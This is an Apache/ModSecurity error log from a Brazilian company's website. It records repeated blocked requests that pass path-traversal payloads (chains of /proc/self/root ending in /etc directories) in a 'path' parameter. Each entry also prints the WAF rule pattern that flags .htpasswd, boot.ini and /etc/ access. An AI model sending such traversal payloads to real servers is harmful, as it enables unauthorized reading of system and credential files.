[Wed Mar 18 11:58:57.308530 2026] [mime_magic:error] [pid 17653:tid 140411741927168] (70014)End of file found: [client 57.141.18.18:33456] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:58:59.267428 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:40628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9suoXxyEfFpUF8f96HAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:00.866996 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:48712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9tAkwaGbbGflqUZAcOQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:02.438094 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:48718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9tsdf6f5d65gmYZThQAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:03.761573 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:48722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9t-oXxyEfFpUF8f96IAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:05.081598 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:48730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9uew_le52K8_3pV3r2QAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:06.446255 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:48734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9ukzinOy1jxa1j4cicgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:07.763598 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:48750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9uymAPhZkrhU8w4l5oQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:09.080207 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:48756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9vSmAPhZkrhU8w4l5pwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:10.482691 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:57038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9vimAPhZkrhU8w4l5rQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:11.813861 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:57048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9v9Y0UrI5A3LftIy8GwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:13.141558 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:57056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9wew_le52K8_3pV3r4wAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:14.471646 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:57060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9wimAPhZkrhU8w4l5sgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:15.798748 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:57064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9w-w_le52K8_3pV3r7QAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:17.086180 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:57072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9xdY0UrI5A3LftIy8HAAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:18.495609 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:57088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9xtY0UrI5A3LftIy8IAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:19.863205 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:57676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9x9Y0UrI5A3LftIy8IwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:22.443961 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:57682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9ykzinOy1jxa1j4ciggAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:23.802835 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:57696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9y-yqAr6etmhZHNrQIAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:25.075803 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:57702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9zdY0UrI5A3LftIy8LAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:26.403019 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:57712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9zuoXxyEfFpUF8f96KQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:27.758996 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:57720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9z-yqAr6etmhZHNrQKQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
